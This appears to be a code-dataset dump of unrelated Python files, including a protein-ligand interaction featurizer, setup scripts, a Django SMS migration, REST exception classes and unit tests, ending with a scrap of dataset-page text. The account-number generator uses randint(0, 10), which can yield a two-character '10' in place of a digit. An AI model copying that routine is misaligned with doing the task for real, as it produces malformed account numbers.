          # vector...
          for hydrogen in hydrogens:
            # Deviation from a straight donor-H-acceptor arrangement.
            angle = math.fabs(180 - angle_between_three_points(
                ligand_atom.coordinates, hydrogen.coordinates,
                receptor_atom.coordinates) * 180.0 / math.pi)
            if angle <= H_BOND_ANGLE:
              hbonds_key = (
                  "HDONOR-" + hydrogen.comment + "_" +
                  receptor_atom.side_chain_or_backbone() + "_" +
                  receptor_atom.structure)
              hashtable_entry_add_one(hbonds, hbonds_key)
  return hbonds
def compute_pi_pi_stacking(ligand, receptor):
  """
  Computes pi-pi stacking interactions.

  Returns a dictionary with keys of form STACKING_${STRUCTURE} where
  STRUCTURE is "ALPHA" or "BETA" or "OTHER". Values are counts of the
  number of such stacking interactions.

  Parameters
  ----------
  ligand: PDB Object.
    small molecule to dock.
  receptor: PDB Object
    protein to dock against.
  """
  pi_stacking = {'STACKING_ALPHA': 0, 'STACKING_BETA': 0, 'STACKING_OTHER': 0}
  for lig_aromatic in ligand.aromatic_rings:
    for rec_aromatic in receptor.aromatic_rings:
      dist = lig_aromatic.center.dist_to(rec_aromatic.center)
      if dist >= PI_PI_CUTOFF:
        continue
      # Candidate interaction. Check whether the two ring planes are
      # roughly parallel (normals within 30 degrees of 0 or 180).
      lig_aromatic_norm_vector = Point(
          coords=np.array([lig_aromatic.plane_coeff[0],
                           lig_aromatic.plane_coeff[1],
                           lig_aromatic.plane_coeff[2]]))
      rec_aromatic_norm_vector = Point(
          coords=np.array([rec_aromatic.plane_coeff[0],
                           rec_aromatic.plane_coeff[1],
                           rec_aromatic.plane_coeff[2]]))
      angle_between_planes = (
          angle_between_points(
              lig_aromatic_norm_vector, rec_aromatic_norm_vector)
          * 180.0/math.pi)
      if (math.fabs(angle_between_planes-0) >= 30.0
          and math.fabs(angle_between_planes-180) >= 30.0):
        continue
      # The planes are more or less parallel, so this is probably pi-pi
      # stacking. Stacked rings are usually staggered rather than exactly
      # on top of each other, so instead of comparing ring centers,
      # project each ring's atoms onto the other ring's plane and test
      # whether any projection falls within the (padded) ring radius.
      pi_pi = any(
          project_point_onto_plane(
              ligand.all_atoms[lig_idx].coordinates,
              rec_aromatic.plane_coeff).dist_to(rec_aromatic.center)
          <= rec_aromatic.radius + PI_PADDING
          for lig_idx in lig_aromatic.indices)
      if not pi_pi:
        # Try the symmetric test: receptor atoms projected onto the
        # ligand ring's plane.
        pi_pi = any(
            project_point_onto_plane(
                receptor.all_atoms[rec_idx].coordinates,
                lig_aromatic.plane_coeff).dist_to(lig_aromatic.center)
            <= lig_aromatic.radius + PI_PADDING
            for rec_idx in rec_aromatic.indices)
      if pi_pi:
        structure = receptor.all_atoms[rec_aromatic.indices[0]].structure
        if structure == "":
          # The ring could belong to a cofactor or other group with no
          # assigned secondary structure.
          structure = "OTHER"
        key = "STACKING_" + structure
        hashtable_entry_add_one(pi_stacking, key)
  return pi_stacking
def compute_pi_cation(ligand, receptor):
  """
  Computes number of pi-cation interactions.

  Returns a dictionary whose keys are of form
  PI-CATION_${MOLTYPE}-CHARGED_${STRUCTURE} where MOLTYPE is either
  "LIGAND" or "RECEPTOR" and STRUCTURE is "ALPHA" or "BETA" or "OTHER".

  Parameters
  ----------
  ligand: PDB Object
    small molecule to dock.
  receptor: PDB Object
    protein to dock against.
  """
  pi_cation = {
      'PI-CATION_LIGAND-CHARGED_ALPHA': 0,
      'PI-CATION_LIGAND-CHARGED_BETA': 0,
      'PI-CATION_LIGAND-CHARGED_OTHER': 0,
      'PI-CATION_RECEPTOR-CHARGED_ALPHA': 0,
      'PI-CATION_RECEPTOR-CHARGED_BETA': 0,
      'PI-CATION_RECEPTOR-CHARGED_OTHER': 0}
  # Receptor aromatic rings vs. positively charged ligand groups.
  for aromatic in receptor.aromatic_rings:
    for charged in ligand.charges:
      # Only positive charges (cations) participate.
      if not charged.positive:
        continue
      if charged.coordinates.dist_to(aromatic.center) >= CATION_PI_CUTOFF:
        continue
      # Project the charge onto the plane of the aromatic ring and
      # require it to fall within the (padded) ring radius.
      charge_projected = project_point_onto_plane(
          charged.coordinates, aromatic.plane_coeff)
      if (charge_projected.dist_to(aromatic.center)
          < aromatic.radius + PI_PADDING):
        structure = receptor.all_atoms[aromatic.indices[0]].structure
        if structure == "":
          # Could be interacting with a cofactor or other group with no
          # assigned secondary structure.
          structure = "OTHER"
        key = "PI-CATION_LIGAND-CHARGED_" + structure
        hashtable_entry_add_one(pi_cation, key)
  # Ligand aromatic rings vs. positively charged receptor groups.
  for aromatic in ligand.aromatic_rings:
    for charged in receptor.charges:
      if not charged.positive:
        continue
      if charged.coordinates.dist_to(aromatic.center) >= CATION_PI_CUTOFF:
        continue
      charge_projected = project_point_onto_plane(
          charged.coordinates, aromatic.plane_coeff)
      if (charge_projected.dist_to(aromatic.center)
          < aromatic.radius + PI_PADDING):
        structure = receptor.all_atoms[charged.indices[0]].structure
        if structure == "":
          structure = "OTHER"
        key = "PI-CATION_RECEPTOR-CHARGED_" + structure
        hashtable_entry_add_one(pi_cation, key)
  return pi_cation
def compute_contacts(ligand, receptor):
  """Compute distance measurements for ligand-receptor atom pairs.

  Returns two dictionaries (close contacts, then contacts), each of whose
  keys are of form ATOMTYPE_ATOMTYPE (the two cleaned atom types, sorted).

  Parameters
  ----------
  ligand: PDB object
    Should be loaded with the ligand in question.
  receptor: PDB object.
    Should be loaded with the receptor in question.
  """
  # Pre-populate every possible unordered atom-type pair with a zero count
  # so the key set (and hence the feature-vector layout) is fixed.
  ligand_receptor_contacts, ligand_receptor_close_contacts = {}, {}
  for first, second in itertools.product(
      Binana.atom_types, Binana.atom_types):
    key = "_".join(sorted([first, second]))
    ligand_receptor_contacts[key] = 0
    ligand_receptor_close_contacts[key] = 0
  for ligand_index in ligand.all_atoms:
    # Hoisted out of the inner loop: the ligand atom and its cleaned
    # atom type are invariant while scanning receptor atoms.
    ligand_atom = ligand.all_atoms[ligand_index]
    ligand_type = clean_atomtype(ligand_atom.atomtype)
    for receptor_index in receptor.all_atoms:
      receptor_atom = receptor.all_atoms[receptor_index]
      dist = ligand_atom.coordinates.dist_to(receptor_atom.coordinates)
      key = "_".join(
          sorted([ligand_type, clean_atomtype(receptor_atom.atomtype)]))
      if dist < CONTACT_CUTOFF:
        hashtable_entry_add_one(
            ligand_receptor_contacts, key)
      if dist < CLOSE_CONTACT_CUTOFF:
        hashtable_entry_add_one(
            ligand_receptor_close_contacts, key)
  return ligand_receptor_close_contacts, ligand_receptor_contacts
def compute_salt_bridges(ligand, receptor):
  """
  Computes number of ligand-receptor salt bridges.

  Returns a dictionary with keys of form SALT-BRIDGE_${STRUCTURE} where
  STRUCTURE is "ALPHA" or "BETA" or "OTHER."

  Parameters
  ----------
  ligand: PDB Object
    small molecule to dock.
  receptor: PDB Object
    protein to dock against.
  """
  salt_bridges = {'SALT-BRIDGE_ALPHA': 0, 'SALT-BRIDGE_BETA': 0,
                  'SALT-BRIDGE_OTHER': 0}
  for receptor_charge in receptor.charges:
    for ligand_charge in ligand.charges:
      # A salt bridge requires opposite charges within the cutoff.
      if ligand_charge.positive != receptor_charge.positive:
        if (ligand_charge.coordinates.dist_to(
            receptor_charge.coordinates) < SALT_BRIDGE_CUTOFF):
          structure = receptor.all_atoms[receptor_charge.indices[0]].structure
          if structure == "":
            # Bug fix: mirror the other interaction functions and bucket
            # atoms without an assigned secondary structure (e.g.
            # cofactors) as "OTHER". Without this, the key "SALT-BRIDGE_"
            # falls outside the fixed key set above and corrupts the
            # feature-vector layout.
            structure = "OTHER"
          key = "SALT-BRIDGE_" + structure
          hashtable_entry_add_one(salt_bridges, key)
  return salt_bridges
class Binana:
  """
  Binana extracts a fingerprint from a provided binding pose.

  The Binana feature vector transforms a ligand-receptor binding pose
  into a feature vector. The feature vector has the following
  components:

    -vina_output: Components of vina's score function.
    -ligand_receptor_contacts: List of contacts between ligand and
       receptor atoms (< 4 A)
    -ligand_receptor_electrostatics: Coulomb energy between contacting
       ligand and receptor atoms.
    -ligand_atom_counts: The atom types in the ligand.
    -ligand_receptor_close_contacts: List of close contacts between
       ligand and receptor (< 2.5 A)
    -hbonds: List of hydrogen bonds.
    -hydrophobic: List of hydrophobic contacts.
    -stacking: List of pi-pi stacking.
    -pi_cation: List of pi-cation interactions.
    -t_shaped: List of T-shaped interactions.
       The pi-cloud concentrates negative charge, leaving the edges of the
       aromatic ring with some positive charge. Hence, T-shaped interactions
       align the positive exterior of one ring with the negative interior of
       another. See wikipedia for details.
    -active_site_flexibility: Considers whether the receptor atoms are
       backbone or sidechain and whether they are part of
       alpha-helices or beta-sheets.
    -salt_bridges: List of salt-bridges between ligand and receptor.
    -rotatable_bonds_count: Count of (ligand(?), receptor(?))
       rotatable bonds.

  TODO(rbharath): Write a function that extracts the binding-site residues
  and their numbers. This will prove useful when debugging the fingerprint
  for correct binding-pocket interactions.

  TODO(rbharath): Write functions that list charged/aromatic groups in the
  binding-site residues and in the ligand.
  """
  # TODO(rbharath): What is atom type A here?
  atom_types = [
      "A", "AL", "AS", "B", "BE", "BR", "C", "CA", "CD", "CO", "CL", "CU",
      "F", "FE", "H", "HG", "HD", "I", "IR", "MG", "MN", "N", "NA", "NI",
      "O", "OA", "OS", "P", "PT", "RE", "RH", "RU", "S", "SA", "SE", "SI",
      "SR", "V", "ZN"]

  @staticmethod
  def num_features():
    """Returns the length of Binana's feature vectors (an int)."""
    num_atoms = len(Binana.atom_types)
    # Bug fix: use integer (floor) division. The pair-count term
    # num_atoms*(num_atoms+1)/2 is mathematically an integer, but "/"
    # yields a float in Python 3 while callers compare this value against
    # len() results.
    feature_len = (
        3 * num_atoms * (num_atoms + 1) // 2 + num_atoms
        + 12 + 6 + 3 + 6 + 3 + 6 + 3 + 1)
    return feature_len

  def compute_input_vector_from_files(
      self, ligand_pdb_filename, receptor_pdb_filename, line_header):
    """Computes feature vector for ligand-receptor pair.

    Parameters
    ----------
    ligand_pdb_filename: string
      path to ligand's pdb file.
    receptor_pdb_filename: string
      path to receptor pdb file.
    line_header: string
      line separator in PDB files
    """
    # Load receptor and ligand from file.
    receptor = PDB()
    receptor.load_from_files(receptor_pdb_filename, line_header)
    receptor.assign_secondary_structure()

    ligand = PDB()
    ligand.load_from_files(ligand_pdb_filename, line_header)
    # Bug fix: the computed feature vector was previously discarded.
    return self.compute_input_vector(ligand, receptor)

  def compute_input_vector(self, ligand, receptor):
    """Computes feature vector for ligand-receptor pair.

    Parameters
    ----------
    ligand: PDB object
      Contains loaded ligand.
    receptor: PDB object
      Contains loaded receptor.
    """
    rotatable_bonds_count = {'rot_bonds': ligand.rotatable_bonds_count}
    ligand_receptor_close_contacts, ligand_receptor_contacts = (
        compute_contacts(ligand, receptor))
    ligand_receptor_electrostatics = (
        compute_electrostatic_energy(ligand, receptor))
    ligand_atom_counts = compute_ligand_atom_counts(ligand)
    hbonds = compute_hydrogen_bonds(ligand, receptor)
    hydrophobics = compute_hydrophobic_contacts(ligand, receptor)
    stacking = compute_pi_pi_stacking(ligand, receptor)
    pi_cation = compute_pi_cation(ligand, receptor)
    t_shaped = compute_pi_t(ligand, receptor)
    active_site_flexibility = (
        compute_active_site_flexibility(ligand, receptor))
    salt_bridges = compute_salt_bridges(ligand, receptor)

    # Concatenate all counts in a deterministic (sorted-key) order.
    input_vector = []
    for features in [ligand_receptor_contacts,
                     ligand_receptor_electrostatics, ligand_atom_counts,
                     ligand_receptor_close_contacts, hbonds, hydrophobics,
                     stacking, pi_cation, t_shaped,
                     active_site_flexibility, salt_bridges,
                     rotatable_bonds_count]:
      for key in sorted(features.keys()):
        input_vector.append(features[key])
    if len(input_vector) != Binana.num_features():
      raise ValueError("Feature length incorrect.")
    return input_vector
class NNScoreComplexFeaturizer(ComplexFeaturizer):
  """
  Compute NNScore (Binana) fingerprints for ligand-protein complexes.
  """

  def __init__(self):
    self.binana = Binana()

  def _featurize_complex(self, mol_pdb, protein_pdb):
    """
    Compute Binana fingerprint for complex.

    Parameters
    ----------
    mol_pdb: iterable of str
      Lines of the ligand's PDB file (written verbatim to disk).
    protein_pdb: iterable of str
      Lines of the protein's PDB file (written verbatim to disk).
    """
    tempdir = tempfile.mkdtemp()
    # Bug fix: wrap the work in try/finally so the temporary directory is
    # removed even when an intermediate step raises.
    try:
      # Write the raw PDB text to disk so the external
      # hydrogenation/partial-charge tools can operate on files.
      mol_pdb_file = os.path.join(tempdir, "mol.pdb")
      with open(mol_pdb_file, "w") as mol_f:
        mol_f.writelines(mol_pdb)
      protein_pdb_file = os.path.join(tempdir, "protein.pdb")
      with open(protein_pdb_file, "w") as protein_f:
        protein_f.writelines(protein_pdb)

      # Add hydrogens and compute partial charges (produces pdbqt files).
      mol_hyd_file = os.path.join(tempdir, "mol_hyd.pdb")
      mol_pdbqt_file = os.path.join(tempdir, "mol_hyd.pdbqt")
      hydrogenate_and_compute_partial_charges(
          mol_pdb_file, "pdb", tempdir, mol_hyd_file, mol_pdbqt_file)
      protein_hyd_file = os.path.join(tempdir, "protein_hyd.pdb")
      protein_pdbqt_file = os.path.join(tempdir, "protein_hyd.pdbqt")
      hydrogenate_and_compute_partial_charges(
          protein_pdb_file, "pdb", tempdir, protein_hyd_file,
          protein_pdbqt_file)

      mol_pdb_obj = PDB()
      mol_pdb_obj.load_from_files(mol_pdb_file, mol_pdbqt_file)
      protein_pdb_obj = PDB()
      protein_pdb_obj.load_from_files(protein_pdb_file, protein_pdbqt_file)

      return self.binana.compute_input_vector(mol_pdb_obj, protein_pdb_obj)
    finally:
      shutil.rmtree(tempdir)
| StarcoderdataPython |
1618482 | <reponame>lucianogsilvestri/sarkas<filename>setup.py
import glob
import os
import setuptools
import sys
from configparser import ConfigParser
from setuptools.command.develop import develop
from setuptools.command.install import install
# The following are needed to copy the MSU plot styles in Matplotlib folder
# From https://stackoverflow.com/questions/20288711/post-install-script-with-python-setuptools
class PostDevelopCommand(develop):
    """Post-installation for development mode."""

    def run(self):
        develop.run(self)
        import matplotlib as mpl
        import shutil

        # Matplotlib resolves named styles against its "stylelib" data
        # folder, so the MSU styles are copied there after install.
        library_dir = os.path.join(mpl.get_data_path(), "stylelib")
        styles_dir = os.path.join(os.getcwd(), os.path.join("sarkas", "mplstyles"))
        pattern = os.path.join(styles_dir, "*.%s" % ("mplstyle"))
        for style_file in glob.glob(pattern):
            fname = os.path.basename(style_file)
            shutil.copy(style_file, os.path.join(library_dir, fname))
            print("%s style installed" % (fname))
class PostInstallCommand(install):
    """Post-installation for installation mode."""

    def run(self):
        install.run(self)
        import matplotlib as mpl
        import shutil

        # Matplotlib resolves named styles against its "stylelib" data
        # folder, so the MSU styles are copied there after install.
        library_dir = os.path.join(mpl.get_data_path(), "stylelib")
        styles_dir = os.path.join(os.getcwd(), os.path.join("sarkas", "mplstyles"))
        pattern = os.path.join(styles_dir, "*.%s" % ("mplstyle"))
        for style_file in glob.glob(pattern):
            fname = os.path.basename(style_file)
            shutil.copy(style_file, os.path.join(library_dir, fname))
            print("%s style installed" % (fname))
# Package requirements (runtime dependencies installed alongside sarkas).
BASE_DEPENDENCIES = [
    "numpy",
    "scipy",
    "pandas",
    "numba>=0.50",
    "pyfftw",
    "pyyaml",
    "tables",
    "tqdm",
    "pyfiglet==0.8.post1",
    "pickle5",
    "jupyter",
    "jupyterlab",
    "notebook",
    "matplotlib",
    "seaborn",
]

# Get package metadata values from setup.cfg.
conf = ConfigParser()
conf.read(["setup.cfg"])
metadata = dict(conf.items("metadata"))

PACKAGENAME = metadata.get("package_name")
DESCRIPTION = metadata.get("description")
DESCRIPTION_FILE = metadata.get("description-file")
PACKAGEDIR = metadata.get("package_dir")
VERSION = metadata.get("version")
AUTHOR = metadata.get("author")
AUTHOR_EMAIL = metadata.get("author_email")
LICENSE = metadata.get("license")
URL = metadata.get("url")
__minimum_python_version__ = metadata.get("minimum_python_version")

# Enforce Python version check - this is the same check as in __init__.py but
# this one has to happen before importing ah_bootstrap.
if sys.version_info < tuple((int(val) for val in __minimum_python_version__.split("."))):
    # Bug fix: the message previously printed the literal word "packagename"
    # instead of the actual package name from setup.cfg.
    sys.stderr.write(
        "ERROR: {} requires Python {} or later\n".format(
            PACKAGENAME, __minimum_python_version__))
    sys.exit(1)

# Read the README file into a string for the long description.
with open(DESCRIPTION_FILE, "r") as fh:
    long_description = fh.read()

# Treat everything in scripts/ as a script to be installed.
# (glob.glob already returns a list; no comprehension needed.)
scripts = glob.glob(os.path.join("scripts", "*"))

setuptools.setup(
    name=PACKAGENAME,
    version=VERSION,
    author=AUTHOR,
    author_email=AUTHOR_EMAIL,
    description=DESCRIPTION,
    long_description=long_description,
    long_description_content_type="text/markdown",
    url=URL,
    scripts=scripts,
    packages=setuptools.find_packages(),
    install_requires=BASE_DEPENDENCIES,
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Intended Audience :: Science/Research",
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires=">=3.7",
    # Run the post-installation steps above (copy the MSU Matplotlib styles).
    cmdclass={
        "develop": PostDevelopCommand,
        "install": PostInstallCommand,
    },
)
3221144 | #@jacksontenorio8
"""Desenvolva um programa que leia as duas notas de um aluno,
calcule e mostre sua média"""
n1 = float(input('Digite a primeira nota: '))
n2 = float(input('Digite a segunda nota: '))
m = float((n1 + n2) / 2)
print('A média entre {} e {} é igual a {:.2f}.'.format(n1, n2, m)) | StarcoderdataPython |
1785451 | <reponame>water-law/waterlawblog
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2019-10-15 13:59
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial schema for the `misaka` app (auto-generated by Django 1.11.4).

    Creates the AliyunAccount, SmsMessage, SmsSign and SmsTemplate models,
    then wires SmsMessage's foreign keys to SmsSign and SmsTemplate.
    Auto-generated migrations should generally not be edited by hand.
    """

    # First migration for this app: no prior migration state exists.
    initial = True

    dependencies = [
    ]

    operations = [
        # Credentials for calling the Aliyun SMS API.
        migrations.CreateModel(
            name='AliyunAccount',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100, verbose_name='阿里云用户名')),
                ('app_id', models.CharField(editable=False, max_length=64, verbose_name='阿里云app_id')),
                ('app_secret', models.CharField(editable=False, max_length=64, verbose_name='阿里云app_secret')),
            ],
        ),
        # One record per SMS send attempt, newest first.
        migrations.CreateModel(
            name='SmsMessage',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('phone_numbers', models.CharField(max_length=30, verbose_name='短信接收号码')),
                ('params', models.TextField(blank=True, verbose_name='消息参数')),
                ('up_extend_code', models.CharField(blank=True, max_length=20, verbose_name='上行短信扩展码')),
                ('out_id', models.CharField(blank=True, max_length=30, verbose_name='外部流水扩展字段')),
                ('code', models.CharField(max_length=20, verbose_name='短信接口返回码')),
                ('created', models.DateTimeField(default=django.utils.timezone.now, verbose_name='创建时间')),
            ],
            options={
                'ordering': ['-created'],
            },
        ),
        # An SMS signature registered with the provider.
        migrations.CreateModel(
            name='SmsSign',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('signature', models.CharField(max_length=30, verbose_name='签名')),
                ('sign_type', models.SmallIntegerField(choices=[(1, '验证码或短信通知'), (2, '推广短信或群发助手')], default=1, verbose_name='签名类型')),
                ('price', models.FloatField(verbose_name='每条短信的价格')),
                ('sign_use', models.SmallIntegerField(choices=[(1, '签名为自己产品名/网站名'), (2, '签名为他人产品名/网站名')], default=1, verbose_name='签名用途')),
                ('enabled', models.BooleanField(default=True, verbose_name='是否启用')),
            ],
        ),
        # An SMS message template registered with the provider.
        migrations.CreateModel(
            name='SmsTemplate',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50, verbose_name='模版名称')),
                ('template_code', models.CharField(max_length=30, verbose_name='模版CODE')),
                ('template_type', models.SmallIntegerField(choices=[(1, '验证码'), (2, '短信通知')], default=1, verbose_name='模版类型')),
                ('price', models.FloatField(verbose_name='每条短信的价格')),
                ('params', models.TextField(blank=True, verbose_name='模板参数')),
                ('content', models.TextField(blank=True, verbose_name='模版内容')),
                ('enabled', models.BooleanField(default=True, verbose_name='是否启用')),
            ],
        ),
        # Foreign keys added after model creation (SmsMessage -> SmsSign/SmsTemplate).
        migrations.AddField(
            model_name='smsmessage',
            name='sign',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='misaka.SmsSign', verbose_name='短信签名'),
        ),
        migrations.AddField(
            model_name='smsmessage',
            name='template',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='misaka.SmsTemplate', verbose_name='短信模板'),
        ),
    ]
1771193 | from rest_framework.exceptions import APIException, ValidationError, NotFound
class ExternalAPIError(APIException):
    """Raised when a call to an upstream/external API fails."""

    def __init__(self, detail=None, code=None):
        # Bug fix: forward the caller's arguments. The original always
        # passed literal None to the parent, discarding any supplied
        # detail/code.
        super().__init__(detail, code)
        if detail is None:
            # Default machine-readable payload when no detail is given.
            self.detail = {'error_code': 1100, 'message': "External API has problems"}
class NoAtError(ValidationError):
    """Raised when the required 'at' query parameter is missing."""

    def __init__(self, detail=None, code=None):
        # Bug fix: forward the caller's arguments. The original always
        # passed literal None to the parent, discarding any supplied
        # detail/code.
        super().__init__(detail, code)
        if detail is None:
            # Default machine-readable payload when no detail is given.
            self.detail = {'error_code': 1000, 'message': "No 'at' query param"}
class InvalidAtError(ValidationError):
    """Raised when the 'at' query parameter cannot be parsed/validated."""

    def __init__(self, detail=None, code=None):
        # Bug fix: forward the caller's arguments. The original always
        # passed literal None to the parent, discarding any supplied
        # detail/code.
        super().__init__(detail, code)
        if detail is None:
            # Default machine-readable payload when no detail is given.
            self.detail = {'error_code': 1001, 'message': "'at' is not valid"}
class StationNotFoundError(NotFound):
    """Raised when the requested station does not exist."""

    def __init__(self, detail=None, code=None):
        # Bug fix: forward the caller's arguments. The original always
        # passed literal None to the parent, discarding any supplied
        # detail/code.
        super().__init__(detail, code)
        if detail is None:
            # Default machine-readable payload when no detail is given.
            self.detail = {'error_code': 1002, 'message': 'Station not found'}
class WeatherNotFoundError(NotFound):
    """Raised when no weather data exists for the requested query."""

    def __init__(self, detail=None, code=None):
        # Bug fix: forward the caller's arguments. The original always
        # passed literal None to the parent, discarding any supplied
        # detail/code.
        super().__init__(detail, code)
        if detail is None:
            # Default machine-readable payload when no detail is given.
            self.detail = {'error_code': 1003, 'message': 'Weather not found'}
| StarcoderdataPython |
3393205 | from django.urls import path, re_path
import had.app.views.api.v1.persons as api_persons
app_name = "app"
urlpatterns = []
urlpatterns = [
re_path(
r"^persons(/(?P<id>[\w-]+))?/?$",
api_persons.PersonApi.as_view(),
name="user_api"
)
]
| StarcoderdataPython |
3349709 | from random import randint
def generate_account_number ():
number = ''
for d in range (8):
number += str (randint (0, 10))
return number
if __name__ == '__main__':
    # Demo: print one generated account number when run as a script.
    print (generate_account_number())
3256260 | from setuptools import setup
version = '1.1.1'

# Runtime dependencies are maintained in requirements.txt; split() handles
# newline- (and whitespace-) separated entries.
with open('requirements.txt') as requirements:
    install_requires = requirements.read().split()

setup(
    name='pyfrappeclient',
    version=version,
    author='<NAME>',
    author_email='<EMAIL>',
    packages=[
        'frappeclient'
    ],
    install_requires=install_requires,
    # Bug fix: the setuptools keyword is `tests_require`; the misspelled
    # `tests_requires` was silently ignored.
    tests_require=[
        'httmock<=1.2.2',
        'nose<=1.3.4'
    ],
)
97150 | """
Pylibui test suite.
"""
from pylibui.controls import Group, Control
from tests.utils import WindowTestCase
class GroupTest(WindowTestCase):
def setUp(self):
super().setUp()
self.group = Group('my group')
def test_title_initial_value(self):
"""Tests the group's `title` initial value is the one passed to the
constructor."""
self.assertEqual(self.group.title, 'my group')
def test_title_can_be_changed(self):
"""Tests the group's `title` attribute can be changed."""
new_title = 'My new group'
self.group.title = new_title
self.assertEqual(self.group.title, new_title)
def test_margins_initial_value(self):
"""Tests the group's `margin` initial value is False."""
self.assertEqual(self.group.margined, False)
def test_margins_can_be_changed(self):
"""Tests the group's `margin` attribute can be changed."""
self.group.margined = True
self.assertEqual(self.group.margined, True)
| StarcoderdataPython |
149219 | <reponame>Who8MyLunch/WanderBits<gh_stars>0
#!/usr/bin/python
from __future__ import division, print_function, unicode_literals
import os
import unittest
from context import wanderbits
class Test_Things(unittest.TestCase):
    """Unit tests for the concrete Thing classes (Room, Item, User).

    Cleanup: leftover commented-out call lines (e.g. `# B.add(A)`) were
    removed; each had already been converted into an assertRaises check.
    """

    def setUp(self):
        # Load the game configuration shipped with the package so the tests
        # exercise realistic Room/Item/User definitions.
        path_module = os.path.dirname(os.path.abspath(__file__))
        f = os.path.join(path_module, '..', 'wanderbits', 'game.yml')
        self.game_info = wanderbits.config.read(f)

    def tearDown(self):
        pass

    def test_does_room_init(self):
        """A Room instantiates from a config entry."""
        info = self.game_info['rooms'][0]
        wanderbits.things.Room(**info)

    def test_does_item_init(self):
        """An Item instantiates from a config entry."""
        info = self.game_info['items'][0]
        wanderbits.things.Item(**info)

    def test_does_user_init(self):
        """A User instantiates from a config entry."""
        info = self.game_info['user'][0]
        wanderbits.things.User(**info)

    def test_find_things(self):
        """find_thing locates an item by name in a list of things."""
        name = 'apple'
        many_things = [wanderbits.things.Item(**info) for
                       info in self.game_info['items']]
        wanderbits.things.find_thing(many_things, name)

    def test_init_abc(self):
        # Should not be able to instantiate an abstract class.
        self.assertRaises(TypeError, wanderbits.things.Thing)

    #############################################
    # Tests for property values.
    def test_property_name(self):
        info = self.game_info['rooms'][0]
        A = wanderbits.things.Room(**info)
        self.assertTrue('kitchen' in A.name)

    def test_property_description(self):
        info = self.game_info['rooms'][0]
        A = wanderbits.things.Room(**info)
        txt = 'a very tidy average-looking kitchen'
        self.assertTrue(A.description == txt)

    def test_property_size(self):
        info = self.game_info['rooms'][0]
        A = wanderbits.things.Room(**info)
        self.assertTrue(A.size == 1000)

    def test_property_capacity(self):
        info = self.game_info['rooms'][0]
        A = wanderbits.things.Room(**info)
        self.assertTrue(A.capacity == 1000)

    #############################################
    # Tests for container actions.
    def test_add_is_container(self):
        info_apple = self.game_info['items'][0]
        A = wanderbits.things.Item(**info_apple)
        info_sack = self.game_info['items'][1]
        B = wanderbits.things.Item(**info_sack)
        # Put the apple in the sack.
        B.add(A)
        self.assertTrue(A in B.container)

    def test_add_item_twice(self):
        info_apple = self.game_info['items'][0]
        A = wanderbits.things.Item(**info_apple)
        info_sack = self.game_info['items'][1]
        B = wanderbits.things.Item(**info_sack)
        # Put the apple in the sack.
        B.add(A)
        # Adding the same item a second time must raise.
        self.assertRaises(wanderbits.errors.ThingError, B.add, A)

    def test_add_is_not_container(self):
        info_apple = self.game_info['items'][0]
        A = wanderbits.things.Item(**info_apple)
        info_sack = self.game_info['items'][1]
        B = wanderbits.things.Item(**info_sack)
        # Putting the sack in the apple must raise: the apple cannot contain it.
        self.assertRaises(wanderbits.errors.ThingError, A.add, B)

    def test_available_space_init(self):
        info_sack = self.game_info['items'][1]
        B = wanderbits.things.Item(**info_sack)
        self.assertTrue(B.available_space == 100)

    def test_available_space_after_add(self):
        info_apple = self.game_info['items'][0]
        A = wanderbits.things.Item(**info_apple)
        info_sack = self.game_info['items'][1]
        B = wanderbits.things.Item(**info_sack)
        B.add(A)
        # Adding the apple consumes one unit of the sack's capacity.
        self.assertTrue(B.available_space == 99)

    def test_remove(self):
        info_apple = self.game_info['items'][0]
        A = wanderbits.things.Item(**info_apple)
        info_sack = self.game_info['items'][1]
        B = wanderbits.things.Item(**info_sack)
        B.add(A)
        self.assertTrue(A in B.container)
        B.remove(A)
        self.assertTrue(A not in B.container)
        # Removing an item that is no longer present must raise.
        self.assertRaises(wanderbits.errors.ThingError, B.remove, A)

    #############################################
    # User as a container.
    def test_user_local_things(self):
        E = wanderbits.executive.Executive(self.game_info)

        info_apple = self.game_info['items'][0]
        A = wanderbits.things.Item(**info_apple)
        info_sack = self.game_info['items'][1]
        B = wanderbits.things.Item(**info_sack)
        info_room = self.game_info['rooms'][0]
        C = wanderbits.things.Item(**info_room)
        info_rock = self.game_info['items'][2]
        D = wanderbits.things.Item(**info_rock)

        # The apple, sack and kitchen are near the user; the rock is not.
        self.assertTrue(A.name in [n.name for n in E.user.local_things])
        self.assertTrue(B.name in [n.name for n in E.user.local_things])
        self.assertTrue(C.name in [n.name for n in E.user.local_things])
        self.assertFalse(D.name in [n.name for n in E.user.local_things])
# Standalone: run the full suite with verbose per-test output when this
# file is executed directly.
if __name__ == '__main__':
    unittest.main(verbosity=2)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.